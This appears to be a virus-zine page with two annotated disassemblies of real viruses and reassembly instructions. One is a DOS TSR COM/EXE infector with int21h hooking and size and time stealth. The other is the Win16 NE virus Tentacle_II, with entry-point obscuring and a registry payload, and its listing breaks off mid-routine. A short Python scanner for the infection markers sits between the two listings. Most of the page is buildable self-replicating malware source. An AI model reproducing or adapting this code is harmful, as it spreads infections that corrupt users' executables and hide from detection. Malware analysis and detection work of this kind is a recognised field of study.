                  marker in the CRC field of the EXE header)
Author          : ?
Type            : TSR EXE/COM infector with size stealth
Size            : 1076 bytes
Origin          : ?
When            : ?
Status          : ?
Disassembled by : Black Jack

Description:
When an infected file is executed, the virus gains control and goes TSR by
the standard MCB method and hooks int21h. It then infects COM and EXE files
when they are executed or loaded by function 4Bh. The infection process is
100% standard. Date, time and attributes are stored (except that the seconds
field holds the infection mark 60), and a dummy int24h is installed during
infection. Also, the virus uses size stealth for the FCB (functions 11h, 12h),
handle (functions 4Eh, 4Fh) and Win95 long filename (functions 714Eh, 714Fh)
find calls, although the handle stealth won't work because of lots of bugs.
It also has a kind of time stealth: on the get time function (5700h) it
returns the seconds field of the last infected file to hide its infection mark.

Comments:
This is just a stupid and boring DOS virus, I just disassembled it because
of great boredom and because I had found an infected file on my mother's PC
(but please don't ask me how it came there). It's full of bugs and rubbish.

Reassembly tested with Tasm 3.1 and TLink 3.0.

TASM /M cu
TLINK /t cu

\

virus_size = ( v_end - v_start )

.model tiny

.286

.code
                org 100h
start:

                nop                     ; dummy host
                nop
                nop

v_start:
                push es                 ; save PSP segment

                call next               ; calculate delta offset
next:
                pop bp
                sub bp, offset next     ; BP=delta offset

                mov ax, 1818h           ; already resident?
                int 21h
                cmp bx, 0C001h
                je already_resident     ; yes, we're there

                mov ax, ds              ; AX=PSP segment


                dec ax                  ; AX=MCB segment
                mov ds, ax              ; DS=MCB segment

                mov cl, "M"             ; marker: not the last MCB
                xchg ds:[0], cl         ; mark our MCB as not the last
                sub word ptr ds:[3], 40h ; resize MCB
                sub word ptr ds:[12h], 40h ; end segment of this program
                mov bx, ds:[12h]        ; BX=segment of new virus MCB
                mov ds, bx              ; DS=segment of new virus MCB
                inc bx                  ; BX=segment of the virus
                mov es, bx              ; ES=segment of the virus
                mov ds:[0], cl          ; marker of virus MCB
                mov word ptr ds:[1], 8  ; mark as system MCB
                mov word ptr ds:[3], 3Fh ; set virus segment size in MCB

                push cs                 ; DS=CS
                pop ds
                xor di, di              ; DI=0
                lea si, [bp+v_start]    ; SI=start of virus code
                mov cx, virus_size      ; CX=size of virus
                cld                     ; clear direction flag
                rep movsb               ; copy virus to TSR location

                push es                 ; save virus segment

                push es                 ; DS=ES=virus segment
                pop ds

                mov ax, 3521h           ; get int21h vector
                int 21h

                mov ds:[int21h_offset - v_start], bx ; save it
                mov ds:[int21h_segment - v_start], es

                pop es                  ; ES=virus segment

                mov ax, 2521h           ; set new int21h vector
                mov dx, (int21h_handler - v_start) ; DS:DX=new int handler

                int 21h

already_resident:
                pop es                  ; ES=PSP segment
                push cs                 ; DS=CS
                pop ds

                cmp cs:[bp+host_type], "XE" ; is host an EXE?
                je restore_exe

restore_com:
                lea si, [bp+header]     ; original first bytes of host
                mov di, 100h

                cld                     ; clear direction flag
                movsw                   ; move start of host back
                movsb

                push es                 ; DS=ES=PSP segment
                pop ds
                push 100h               ; jump to host start
                ret

restore_exe:
                mov ax, es              ; AX=ES=PSP segment
                add ax, 10h             ; AX=start segment of image
                push es                 ; DS=ES=PSP segment
                pop ds


                add word ptr cs:[bp+host_cs], ax ; relocate jump to host
                add ax, word ptr cs:[bp+host_ss] ; relocate host SS
                mov ss, ax              ; restore host SS
                mov sp, word ptr cs:[bp+host_sp] ; restore host SP

                db 0EAh                 ; jmp far opcode
host_ip         dw ?
host_cs         dw ?

host_ss         dw ?
host_sp         dw ?

int21h_handler:
                cmp ax, 1818h           ; residency check
                jne no_residency_check
                mov bx, 0C001h          ; we're already installed
                iret                    ; quit interrupt execution

no_residency_check:
                cmp ah, 4Bh             ; load/execute file
                jne no_exec
                jmp infect

no_exec:
                cmp ah, 11h             ; FCB find first file?
                je fcb_stealth
                cmp ah, 12h             ; FCB find next file?
                je fcb_stealth

                cmp ah, 4Eh             ; handle find first file?
                jne no_findfirst_handle
                jmp handle_stealth

no_findfirst_handle:
                cmp ah, 4Fh             ; handle find next file?
                jne no_findnext_handle
                jmp short handle_stealth

                nop
no_findnext_handle:

                cmp ax, 714Eh           ; LFN find first file?
                jb no_LFN_stealth
                cmp ax, 714Fh           ; LFN find next file?
                ja no_LFN_stealth
                jmp LFN_stealth

no_LFN_stealth:
                cmp ax, 5700h           ; get file date/time?

                jne org_int21h          ; Jump if not equal
                jmp time_stealth

org_int21h:
                db 0EAh

int21h_pointer  equ this dword
int21h_offset   dw ?
int21h_segment  dw ?

; ----- FCB STEALTH ---------------------------------------------------------

fcb_stealth:

                pushf                   ; simulate int21h call
                call dword ptr cs:[int21h_pointer - v_start]

                pushf                   ; save flags


                pusha                   ; save all regs
                push ds                 ; save segments

                push es

                or al, al               ; FCB search failed?
                jnz exit_fcb_stealth    ; if so, quit stealth routine

                mov ah, 51h             ; get active PSP segment to BX
                int 21h

                mov es, bx              ; ES=active PSP segment
                cmp bx, es:[16h]        ; is it COMMAND.COM calling?
                jne exit_fcb_stealth    ; if not, don't do stealth

                mov ah, 2Fh             ; get DTA to ES:BX
                int 21h

                push es                 ; DS:BX=DTA
                pop ds

                cwd                     ; DX=0

                cmp byte ptr [bx], 0FFh ; is it an extended FCB?
                jne no_extended_fcb
                add bx, 7               ; convert to regular FCB

no_extended_fcb:
                mov cl, [bx+17h]        ; CL=low byte of filetime
                and cl, 00011111b       ; CL=seconds
                cmp cl, 1Dh             ; seconds=60 means infected
                jne exit_fcb_stealth    ; if not, then exit stealth routine

                mov ax, [bx+9]          ; AX:CL=file extension
                mov cl, [bx+1Bh]

                cmp ax, "OC"            ; is it a COM file?
                jne fcb_stealth_no_com
                cmp cl, "M"
                jne exit_fcb_stealth    ; it's not an EXE/COM
                jmp short do_fcb_stealth
                nop

fcb_stealth_no_com:
                cmp ax, "XE"            ; is it an EXE file?
                jne exit_fcb_stealth    ; it's not an EXE/COM
                cmp al, "E"
                jne exit_fcb_stealth    ; it's not an EXE/COM

do_fcb_stealth:
                sub word ptr [bx+1Dh], virus_size ; stealth filesize
                sbb word ptr [bx+1Ch], 0 ; stealth filesize

exit_fcb_stealth:
                pop es                  ; restore segment registers

                pop ds
                popa                    ; restore all regs
                popf                    ; restore flags
                retf 2                  ; return from INT and keep the flags

; ----- HANDLE STEALTH ------------------------------------------------------
; note: this routine is much too buggy to work.

handle_stealth:
                pushf                   ; push flags
                call dword ptr cs:[int21h_pointer - v_start]
                jc findfirstnext_failed


                pushf                   ; save flags
                pusha                   ; save all registers
                push ds                 ; save segment registers

                push es
                push di                 ; save DI (useless)

                mov ah, 2Fh             ; get DTA to ES:BX
                int 21h

; BUG! DS should be set to ES here!!!

                mov cl, [bx+16h]        ; CL=low byte of filetime
                and cl, 00011111b       ; CL=seconds of filetime
                cmp cl, 1Dh             ; seconds=60 means infected
                jne exit_handle_stealth

                push si                 ; save SI (useless)
                lea si, [bx+1Eh]        ; ES:SI=filename
                call get_extension      ; get file extension to AX:CL
                pop si                  ; restore SI

                cmp ax, "OC"            ; could it be a COM file?
                jne handle_stealth_no_com ; check for an EXE
                cmp cl, "M"             ; really a COM?
                jne exit_handle_stealth ; if not, exit stealth routine
                jmp short do_handle_stealth
                nop

handle_stealth_no_com:
                cmp ax, "XE"            ; could it be an EXE file?
                jne exit_handle_stealth ; no EXE/COM, leave stealth routine
                cmp cl, "E"             ; really an EXE?
                jne exit_handle_stealth ; no EXE/COM, leave stealth routine

do_handle_stealth:
                sub word ptr es:[bx+1Ah], virus_size ; fixup filesize

; BUG! hiword of filesize unchanged!!!

exit_handle_stealth:
                pop di                  ; restore DI
                pop es                  ; restore segment registers
                pop ds
                popa                    ; restore all registers
                popf                    ; restore flags

findfirstnext_failed:
                retf 2                  ; return from INT and keep the flags

; ----- LONG FILENAME (WIN95) STEALTH ---------------------------------------

LFN_stealth:
                pushf                   ; simulate int21h call
                call dword ptr cs:[int21h_pointer - v_start]

; ES:DI=finddata structure

                pushf                   ; save flags
                pusha                   ; save all regs
                push ds                 ; save segments

                push es

                jc exit_lfn_stealth     ; exit on error
                nop

                nop


                push es                 ; DS=ES
                pop ds

                mov ax, si              ; SI=DateTimeFormat
                cmp ax, 1               ; 1 means DOS format for date/time
                je dos_datetime_format

                nop
                nop

                mov ax, 71A7h           ; convert date/time format
                xor bl, bl              ; BL=0: Win95 format to DOS format
                mov si, di
                add si, 14h             ; DS:SI=ptr to filetime
                pushf                   ; simulate int21h call

                call dword ptr cs:[int21h_pointer - v_start]
                                        ; return CX=filetime, DX=filedate

                jmp short filetime_in_CX
                nop                     ; stupid single-pass assembler

dos_datetime_format:
                mov cx, es:[di+14h]     ; get filetime in CX

filetime_in_CX:
                and cl, 00011111b       ; CL=file seconds
                cmp cl, 1Dh             ; seconds=60 means infected
                jne exit_lfn_stealth    ; if not, exit stealth routine

                nop
                nop

                push si                 ; save SI (useless)
                lea si, [di+2Ch]        ; DS:SI=filename ptr
                call get_extension      ; get filename extension to AX:CL
                pop si                  ; restore SI

                cmp ax, "OC"            ; could it be a COM file?
                jne lfn_stealth_no_com  ; not a COM

                nop
                nop

                cmp cl, "M"             ; really a COM?
                jne exit_lfn_stealth    ; no COM/EXE, leave stealth routine

                nop
                nop

                jmp short do_lfn_stealth
                nop

lfn_stealth_no_com:
                cmp ax, "XE"            ; could it be an EXE file?
                jne exit_lfn_stealth    ; if not, leave stealth routine.

                nop
                nop

                cmp cl, "E"             ; is it really an EXE?
                jne exit_lfn_stealth    ; no COM/EXE, leave stealth routine

                nop
                nop

do_lfn_stealth:
                sub word ptr es:[di+20h], virus_size ; fixup filesize

                sbb word ptr es:[di+22h], 0

exit_lfn_stealth:
                pop es                  ; restore segment registers

                pop ds
                popa                    ; restore all registers
                popf                    ; restore flags
                retf 2                  ; return from INT and keep the flags


; ----- GET THE FILE EXTENSION ----------------------------------------------

get_extension:
                lodsb                   ; get a char from filename
                cmp al, "."             ; end of filename?
                jne get_extension       ; if not, search on

                cld                     ; clear direction - useless here
                lodsw                   ; get first 2 bytes of extension to AX
                xchg cx, ax             ; move them to CX
                cld                     ; clear direction - useless again
                lodsb                   ; get last byte of extension to AL
                xchg cx, ax             ; AX:CL=file extension
                ret

; ----- TIME STEALTH --------------------------------------------------------

time_stealth:
                pushf                   ; Push flags
                call dword ptr cs:[int21h_pointer - v_start]

                pushf                   ; save flags
                pusha                   ; save all registers
                push ds                 ; save segment registers

                push es

                and cl, 00011111b       ; CL=seconds of filetime
                cmp cl, 1Dh             ; seconds=60 means infected
                jne no_time_stealth
                and cx, 11100000b       ; clear seconds of filetime
                add cl, byte ptr cs:[seconds - v_start] ; set new seconds field

no_time_stealth:
                pop es                  ; restore segment registers

                pop ds
                popa                    ; restore all registers
                popf                    ; restore flags
                retf 2                  ; return from INT and keep the flags

; ----- INFECTION -----------------------------------------------------------

infect:
                pusha                   ; save all registers
                push ds                 ; save also segment registers
                push es

                push ds                 ; save DS (segm to filename)
                xor ax, ax              ; AX=0
                mov ds, ax              ; DS=AX=0=IVT segment

                mov ax, offset int24h_handler ; BUG! forgotten to sub v_start
                mov bx, cs              ; BX:AX=ptr32 to int24h handler
                cli                     ; disable interrupts
                xchg ds:[24h*4], ax     ; set new handler to int24h
                xchg ds:[24h*4+2], bx
                mov word ptr cs:[int24h_offset - v_start], ax ; save old
                mov word ptr cs:[int24h_segment - v_start], bx ; handler
                sti                     ; enable interrupts
                pop ds                  ; restore DS (filename segm)

                mov ax, 4300h           ; get attributes of victim
                int 21h

                push dx                 ; save filename pointer of
                push ds                 ; victim file


push cx ; save attributes of victim

                mov ax, 4301h           ; reset attributes of victim
                xor cx, cx              ; CX=new attributes=0
                int 21h
                jnc get_attributes_ok
                jmp reset_attributes

get_attributes_ok:
                mov ax, 3D02h           ; open file r/w
                int 21h                 ; DS:DX=filename ptr
                jnc openfile_ok
                jmp reset_attributes

openfile_ok:
                xchg bx, ax             ; filehandle to BX

                push cs                 ; DS=ES=CS
                push cs
                pop ds
                pop es

                mov ax, 5700h           ; get file date/time
                int 21h
                push cx                 ; save file time
                push dx                 ; save file date

                mov ah, 3Fh             ; read file header
                mov dx, (header - v_start) ; DS:DX=buffer to read

                mov cx, 1Ch             ; DOS EXE header size
                int 21h

                cmp word ptr cs:[header - v_start], "MZ" ; EXE header?
                jne probably_not_an_exe
                jmp infect_exe

probably_not_an_exe:
                cmp word ptr cs:[2AEh], "ZM" ; EXE header?

                jne not_an_exe
                jmp infect_exe

not_an_exe:
                cmp word ptr cs:[header - v_start], -1 ; SYS file?
                jne infect_com

                jmp restore_filetime

header          db 1Ch dup (0C3h)       ; 0C3h - ret opcode - quit 1st gen

infect_com:
                mov ax, 4202h           ; goto end of file
                xor cx, cx              ; CX:DX=0=distance to move
                cwd
                int 21h

                cmp dx, 0               ; high word of filesize=0 ?
                jbe com_size_ok         ; if yes, file is too big
                jmp restore_filetime    ; to infect

com_size_ok:
                push ax                 ; save filesize
                sub ax, (virus_size+3)  ; the theoretical offset of
                                        ; the jmp if file was infected
                cmp ax, word ptr cs:[header - v_start+1] ; equal means
                                        ; the file is already infected
                pop ax                  ; restore filesize in AX
                jne com_not_infected_yet


                jmp restore_filetime

com_not_infected_yet:
                mov word ptr cs:[host_type - v_start], "OC" ; set host type
                sub ax, 3
                mov word ptr cs:[jmp_distance - v_start], ax
                add ax, 3               ; completely useless instruction

                mov ah, 40h             ; write virus body
                mov dx, 0               ; virus offset in memory
                mov cx, virus_size      ; CX=size to write
                int 21h

                mov ax, 4200h           ; set filepointer to beginning
                xor cx, cx              ; CX:DX=distance to move=0
                cwd
                int 21h

                mov ah, 40h             ; write new jump to filestart
                mov dx, (new_jmp - v_start) ; DS:DX=ptr to buffer

                mov cx, 3               ; write three bytes (near jmp)
                int 21h

                pop dx                  ; restore old file date in DX
                pop cx                  ; restore old file time in CX
                push cx                 ; save CX again
                and cl, 00011111b       ; CL=seconds from filetime
                mov byte ptr cs:[seconds - v_start], cl ; store it
                pop cx                  ; restore CX
                and cl, 11100000b       ; clear seconds from filetime
                add cl, 1Dh             ; mark as infected with seconds=60
                jmp set_filetime        ; set new filetime

new_jmp:
                db 0E9h

jmp_distance    dw ?

infect_exe:
                cmp word ptr cs:[header - v_start+18h], 40h ; Relo table address

                jb no_new_exe
                jmp restore_filetime    ; don't take New EXEs

no_new_exe:
                cmp word ptr cs:[header - v_start+1Ah], 0 ; Overlay number

                je no_overlay
                jmp restore_filetime    ; don't take overlays

no_overlay:
                cmp word ptr cs:[header - v_start+12h], "UC" ; CRC/infection mark

                jne not_infected_yet
                jmp restore_filetime    ; don't reinfect

not_infected_yet:
                mov word ptr cs:[host_type - v_start], "XE" ; mark host as EXE

                mov ax, word ptr cs:[header - v_start+0Eh] ; save SS
                mov cs:[host_ss - v_start], ax

                mov ax, word ptr cs:[header - v_start+10h] ; save SP
                mov cs:[host_sp - v_start], ax
                mov ax, word ptr cs:[header - v_start+16h] ; save CS

                mov cs:[host_cs - v_start], ax
                mov ax, word ptr cs:[header - v_start+14h] ; save IP

                mov cs:[host_ip - v_start], ax

                mov ax, 4202h           ; go to end of file
                xor cx, cx              ; DX:CX=new file pointer


cwd
int 21h

push bx                         ; save file handle
push ax                         ; save filesize
push dx                         ; save filesize high

mov bx, word ptr cs:[header - v_start+08h] ; header size (paras)
shl bx, 4                       ; BX=BX*16 : convert to bytes
sub ax, bx                      ; DX:AX=image size
sbb dx, 0
mov cx, 10h                     ; divide by 16
div cx                          ; calculate new CS/IP

mov word ptr cs:[header - v_start+14h], dx ; IP
mov word ptr cs:[header - v_start+16h], ax ; CS
mov word ptr cs:[header - v_start+0Eh], ax ; SS
mov word ptr cs:[header - v_start+10h], 0FFFEh ; SP
mov word ptr cs:[header - v_start+12h], "UC" ; CRC/marker

pop dx                          ; restore filesize to DX:AX
pop ax

add ax, virus_size              ; calculate new filesize
adc dx, 0

mov cx, 200h                    ; calculate filesize in 512 byte pages
div cx
inc ax                          ; round up pages
mov word ptr cs:[header - v_start+4], ax ; filesize div 512 (pages)
mov word ptr cs:[header - v_start+2], dx ; filesize mod 512

pop bx                          ; restore file handle

mov ah, 40h                     ; write virus to EOF
mov cx, virus_size              ; size to write
mov dx, 0                       ; virus offset in memory
int 21h

mov ax, 4200h                   ; go to start of file
xor cx, cx                      ; DX:CX=new position in file=0
cwd
int 21h

mov ah, 40h                     ; write new EXE header
mov dx, (header - v_start)      ; DS:DX=buffer to write
mov cx, 1Ch                     ; DOS EXE header size
int 21h

pop dx                          ; restore old file date in DX
pop cx                          ; restore old file time in CX
push cx                         ; save CX again
and cl, 00011111b               ; CL=seconds from filetime
mov byte ptr cs:[seconds - v_start], cl ; store it
pop cx                          ; restore CX
and cl, 11100000b               ; clear seconds from filetime
add cl, 1Dh                     ; mark as infected with seconds=60
jmp set_filetime                ; set new filetime

nop                             ; single-pass assembler shit

int24h_handler:
iret                            ; Interrupt return

int24h_offset dw ?


int24h_segment dw ?

restore_filetime:
pop dx                          ; restore old file date in DX
pop cx                          ; restore old file time in CX

set_filetime:
mov ax, 5701h                   ; set file time/date
int 21h

mov ah, 3Eh                     ; close file
int 21h

mov ax, 5700h                   ; get file time/date
int 21h

reset_attributes:
pop cx                          ; restore old file attributes
pop ds                          ; restore pointer to filename
pop dx                          ; in DS:DX
mov ax, 4301h                   ; set file attributes funct.
int 21h

xor ax, ax                      ; AX=0
mov ds, ax                      ; DS=AX=0=IVT segment

mov ax, word ptr cs:[int24h_offset - v_start]  ; BX:AX=ptr32 to old
mov bx, word ptr cs:[int24h_segment - v_start] ; int24h handler

cli                             ; disable interrupts
mov ds:[24h*4], ax              ; restore old int24h handler
mov ds:[24h*4+2], bx
sti                             ; enable interrupts

pop es                          ; restore segment registers
pop ds
popa                            ; restore all other registers
jmp org_int21h

host_type dw "OC"               ; first generation is a COM
seconds db 0
v_end:

end start


comment %

Name            : Win.Tentacle_II
Alias           : Shell
Author          : ?
Type            : direct acting Win16 NE appender
Size            : 10608 bytes virus body (because of relocation stuff
                  infected files increase by at least 10634 bytes)
Origin          : ?
When            : 1996
Status          : was in the wild (distributed in sex newsgroups in 1996)
Disassembled by : Black Jack
Contact me      : [email protected] | http://www.coderz.net/blackjack

Description:

When the virus gets activated, it starts to search for and infect NE EXE files: first one *.EXE file in the current directory, then two in the C:\WINDOWS directory, then one in each of several other possible hardcoded Windows directories (C:\WIN, C:\WIN31, C:\WIN311, C:\WIN95), and then one *.SCR file in the current dir. During infection the virus creates a temporary file C:\TENTACLE.$$$ and rebuilds an infected image of the victim file there. When the infection process is finished this file is copied back over the victim file and then deleted.

The infection technique is adding another segment with the virus code at the end of the file. To add its own entry to the segment table, it checks if there is enough unused room between the end of the NE header tables and the start of the first segment and aborts infection if not. Then it shifts back all tables after the segment table (therefore overwriting the unused fill bytes) and fixes their offsets in the NE header, so that it can write its own segment descriptor at the end of the segment table. In a similar way it adds its own entries to the module-reference and the imported-name table (this is necessary to import two APIs that are used in the payload).

The most interesting feature of the virus is that it was one of the first (if not the very first) viruses using EPO techniques, that means infecting the file without modifying its entry point. To do so, it searches the code segment that contains the entry point for a call to the INITTASK API from KERNEL.DLL, or, if that one is not found, the THUNRTMAIN API from VBRUN300.DLL; these are APIs that should be called at the very beginning of a program. Then the relocation item that is associated with the API call is patched in such a way that this call is redirected to the virus.

While infecting, the virus pays special attention to the WINHELP.EXE file. In Win3.11 this file contains a self-check, which is why the virus patches it in a special way, so that this self-check is disabled.

The payload is activated if the virus is run between 1:00am and 1:05am: the virus drops a file C:\TENTACLE.GIF containing a picture of the violet tentacle from the classic computer game "The Day of the Tentacle" and modifies the registry in such a way that whenever the program associated with .GIF files is run to view such a file it displays the file dropped by the virus. To do so it uses two imported APIs, RegSetValue and RegQueryValue from SHELL.DLL. Additionally, if the virus is executed between 1:15am and 2:00am it runs the opposite effect and undoes the changes in the registry that were done in the payload.

Reassembly tested with Tasm 3.1 and TLink 3.0:

TASM /M tenta2
TLINK tenta2

The first generation sample is a DOS EXE file and infects all suitable EXE files in the current directory only.

%
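The header marks that the two listings on this page describe (the "UC" word the preceding DOS EXE infector writes into the header checksum field, and Tentacle_II's 0FFFEh maxmem word together with its extra SHELL entry in the NE imported-name table) can be checked from the defender's side with a small MZ/NE header parser. This is an added example, not code from the zine or from either virus; all function names are mine, the MZ+NE image it builds is constructed for the test, and it assumes, as the disassembly itself does, that the imported-name table is immediately followed by the entry table.

```python
import struct

# DOS (MZ) header words that follow the 2-byte signature, in file order.
MZ_FIELDS = ("cblp", "cp", "crlc", "cparhdr", "minalloc", "maxalloc",
             "ss", "sp", "csum", "ip", "cs", "lfarlc", "ovno")

# TASM evaluates the constant "UC" as 'U'*256+'C'; stored little-endian the
# checksum word at +12h therefore reads as bytes 'C','U', i.e. 0x5543.
DOSEXE_CSUM_MARKER = 0x5543
# Tentacle_II lowers e_maxalloc from the normal 0FFFFh to 0FFFEh.
TENTACLE_MAXALLOC_MARKER = 0xFFFE


def parse_mz(data):
    """Return the DOS header fields as a dict, or None if not an MZ/ZM image."""
    if len(data) < 0x1C or data[:2] not in (b"MZ", b"ZM"):
        return None
    return dict(zip(MZ_FIELDS, struct.unpack_from("<13H", data, 2)))


def ne_imported_names(data, ne_off):
    """List the length-prefixed module names in the NE imported-name table.

    Assumes the imported-name table ends where the entry table begins, the
    same table order the disassembly relies on.
    """
    if len(data) < ne_off + 0x40 or data[ne_off:ne_off + 2] != b"NE":
        return []
    entry_rel, = struct.unpack_from("<H", data, ne_off + 0x04)
    imp_rel, = struct.unpack_from("<H", data, ne_off + 0x2A)
    pos, end = ne_off + imp_rel, min(ne_off + entry_rel, len(data))
    names = []
    while pos < end:
        n = data[pos]
        if n:                       # the first entry is a zero-length placeholder
            names.append(data[pos + 1:pos + 1 + n])
        pos += 1 + n
    return names


def scan(data):
    """Return the list of indicator strings found in one executable image."""
    hits = []
    mz = parse_mz(data)
    if mz is None:
        return hits
    if mz["csum"] == DOSEXE_CSUM_MARKER:
        hits.append("dosexe: e_csum carries the 'UC' infection mark")
    # A "new" executable has its relocation table at or past 40h and a second
    # header at the offset stored in e_lfanew (+3Ch).
    if mz["lfarlc"] >= 0x40 and len(data) >= 0x40:
        ne_off, = struct.unpack_from("<I", data, 0x3C)
        if data[ne_off:ne_off + 2] == b"NE":
            if mz["maxalloc"] == TENTACLE_MAXALLOC_MARKER:
                hits.append("tentacle: e_maxalloc == 0FFFEh infection mark")
                # SHELL is a common import, so it only corroborates the mark.
                if b"SHELL" in ne_imported_names(data, ne_off):
                    hits.append("tentacle: SHELL present in imported-name table")
    return hits


def build_sample(maxalloc, csum, imports=None):
    """Constructed minimal MZ image (not a real program); with imports given,
    a 64-byte NE header and an imported-name table follow the DOS header."""
    mz = bytearray(0x40)
    mz[0:2] = b"MZ"
    struct.pack_into("<H", mz, 0x0C, maxalloc)
    struct.pack_into("<H", mz, 0x12, csum)
    if imports is None:                               # plain DOS EXE
        struct.pack_into("<H", mz, 0x18, 0x1C)        # e_lfarlc below 40h
        return bytes(mz)
    imp = b"\x00" + b"".join(bytes([len(m)]) + m for m in imports)
    ne = bytearray(0x40)
    ne[0:2] = b"NE"
    struct.pack_into("<H", ne, 0x2A, 0x40)            # imported-name table
    struct.pack_into("<H", ne, 0x04, 0x40 + len(imp)) # entry table after it
    struct.pack_into("<H", mz, 0x18, 0x40)            # e_lfarlc: new-style EXE
    struct.pack_into("<I", mz, 0x3C, 0x40)            # e_lfanew -> NE header
    return bytes(mz + ne + imp)


if __name__ == "__main__":
    samples = (("clean", build_sample(0xFFFF, 0, [b"KERNEL"])),
               ("tentacle", build_sample(0xFFFE, 0, [b"KERNEL", b"SHELL"])),
               ("dosexe", build_sample(0xFFFF, 0x5543)))
    for label, image in samples:
        print(label, scan(image) or ["no markers"])
```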


virus_size EQU (offset virus_end - offset virus_start)

.model tiny
.code
.386
org 0

virus_start:
segm_offset     dw 0
segm_phys_size  dw virus_size
segm_attribs    dw 0001110101010000b ; readable code segment with relocs
segm_virt_size  dw virus_size

reloc_stuff:
dd 0000FFFFh                    ; pointers that will become relocated
dd 0000FFFFh                    ; must be initialised by 0000:FFFF
dd 0000FFFFh

; This is the real start of the relocation data:
dw 3                            ; three relocation items

db 3                            ; 32bit far pointer
db 1                            ; imported ordinal
dw offset RegQueryValue         ; offset of relocation item
size_of_reloc_stuff1 EQU ($ - reloc_stuff)
dw 0                            ; will become module-reference index
reloc_stuff2 dw 6               ; ordinal RegQueryValue

db 3                            ; 32bit far pointer
db 1                            ; imported ordinal
dw offset RegSetValue           ; offset of relocation item
size_of_reloc_stuff2 EQU ($ - reloc_stuff2)
dw 0                            ; will become module-reference index
reloc_stuff3 dw 5               ; ordinal RegSetValue

db 3                            ; 32bit far pointer
db 1                            ; imported ordinal
dw offset org_entry             ; offset of relocation item
size_of_reloc_stuff3 EQU ($ - reloc_stuff3)
dw 0                            ; will become module-reference index
dw 0                            ; will become ordinal of hooked API

virus_entry:
push ds                         ; save DS
pusha                           ; save all registers

push ss                         ; DS=SS
pop ds

sub sp, size stack_frame        ; reserve room on stack
mov bp, sp                      ; setup stack frame

mov ah, 1Ah                     ; set DTA to DS:DX
lea dx, [bp.dta]                ; DS:DX=our DTA in our stack frame
int 21h

mov bx, 1
mov cx, offset empty_string
mov dx, offset exe_wildcard
CALL infect_directory           ; infect one EXE file in current dir


mov bx, 2
mov cx, offset C_windows
mov dx, offset exe_wildcard
CALL infect_directory           ; infect two EXE files in C:\WINDOWS

mov bx, 1
mov cx, offset C_win
mov dx, offset exe_wildcard
CALL infect_directory           ; infect one EXE file in C:\WIN

mov bx, 1
mov cx, offset C_win31
mov dx, offset exe_wildcard
CALL infect_directory           ; infect one EXE file in C:\WIN31

mov bx, 1
mov cx, offset C_win311
mov dx, offset exe_wildcard
CALL infect_directory           ; infect one EXE file in C:\WIN311

mov bx, 1
mov cx, offset C_win95
mov dx, offset exe_wildcard
CALL infect_directory           ; infect one EXE file in C:\WIN95

mov bx, 1
mov cx, offset empty_string
mov dx, offset scr_wildcard
CALL infect_directory           ; infect one SCR in current dir

mov ah, 1Ah                     ; set DTA to DS:DX
mov dx, 7Fh                     ; DX=80h (standard DTA offset)
inc dx
push ds                         ; save DS
push es                         ; DS=ES=PSP (or equivalent) segment
pop ds
int 21h

pop ds                          ; restore DS

mov ah, 2Ch                     ; get the system time to CX/DX
int 21h                         ; CH=hours, CL=minutes, DH=seconds
                                ; DL=1/100 seconds

cmp cx, 100h                    ; is it before 1:00am ?
JB restore_host                 ; if yes, no payload
cmp cx, 105h                    ; is it before 1:05am ?
JB change_gif_cmdline           ; call payload between 1:00 and 1:05
cmp cx, 10Fh                    ; is it before 1:15am ?
JB restore_host                 ; if yes, no payload
cmp cx, 200h                    ; is it after 2:00am ?
JAE restore_host                ; if yes, no payload
mov ax, 0                       ; restore old gif commandline
JMP call_payload                ; call payload between 1:15 and 2:00

change_gif_cmdline:
mov ax, 1                       ; change gif commandline to our file

call_payload:
CALL payload                    ; play with the gif commandline in
                                ; the win16 "registry".

restore_host:


add sp, size stack_frame        ; free room on stack

popa                            ; restore all registers
pop ds                          ; restore DS
JMP cs:org_entry                ; jump to the API that was hooked
                                ; for the EPO while infecting.

C_win db "C:\WIN\", 0

; The following two subroutines are not used anywhere in the virus. I guess
; that they were just used in the first generation sample, and accidentally
; left in by the virus author. That's why I also used them in the first
; generation carrier of the disassembly.

encrypt_wildcard:
push si                         ; save SI
push di                         ; save DI
push es                         ; save ES

push ds                         ; ES=DS
pop es

mov di, si                      ; DI=SI
xor al, al                      ; AL=0
mov cx, 0FFFFh                  ; search whole segment
repne scasb                     ; search for the end of the string
dec di                          ; go back to the terminating zero
mov ax, di                      ; AX=end of string
                                ; SI=start of string
sub ax, si                      ; AX=length of string

pop es                          ; restore ES
pop di                          ; restore DI

mov cx, ax                      ; CX=length of string

encrypt_wildcard_loop:
inc byte ptr [si]               ; encrypt one byte from string
inc si                          ; next byte
loop encrypt_wildcard_loop

pop si                          ; restore SI
RET

encrypt_path:
push si                         ; save SI
push di                         ; save DI
push es                         ; save ES

push ds                         ; ES=DS
pop es

mov di, si                      ; DI=SI
xor al, al                      ; AL=0
mov cx, 0FFFFh                  ; search whole segment
repne scasb                     ; search for the end of the string
dec di                          ; go back to the terminating zero
mov ax, di                      ; AX=end of string
                                ; SI=start of string


sub ax, si                      ; AX=length of string

pop es                          ; restore ES
pop di                          ; restore DI

mov cx, ax                      ; CX=length of string

encrypt_path_loop:
dec byte ptr [si]               ; encrypt one byte from string
inc si                          ; next byte
loop encrypt_path_loop

pop si                          ; restore SI
RET

; ----- DECRYPT PATH STRING -------------------------------------------------
; Entry:
;   SI - pointer to source buffer
;   DI - pointer to destination buffer
; Exit:
;   DI - end of destination buffer

decrypt_path:
cld                             ; clear direction flag

push di                         ; save DI
push es                         ; save ES

push ds                         ; ES=DS
pop es

mov di, si                      ; DI=SI
xor al, al                      ; AL=0
mov cx, 0FFFFh                  ; search whole segment
repne scasb                     ; search for the end of the string
dec di                          ; go back to the terminating zero
mov ax, di                      ; AX=end of string
                                ; SI=start of string
sub ax, si                      ; AX=length of string

pop es                          ; restore ES
pop di                          ; restore DI

mov cx, ax                      ; CX=length of string
inc cx                          ; because the LOOP immediately follows
JMP loop_decrypt_path

decrypt_path_loop:
lodsb                           ; load a byte from source string
inc al                          ; decrypt it
stosb                           ; store decrypted byte

loop_decrypt_path:
loop decrypt_path_loop

movsb                           ; move terminating zero
RET

; ----- DECRYPT WILDCARD STRING ---------------------------------------------
; Entry:


;   SI - pointer to source buffer
;   DI - pointer to destination buffer
; Exit:
;   DI - end of destination buffer

decrypt_wildcard:
cld                             ; clear direction flag

push di                         ; save DI
push es                         ; save ES

push ds                         ; ES=DS
pop es

mov di, si                      ; DI=SI
xor al, al                      ; AL=0
mov cx, 0FFFFh                  ; search whole segment
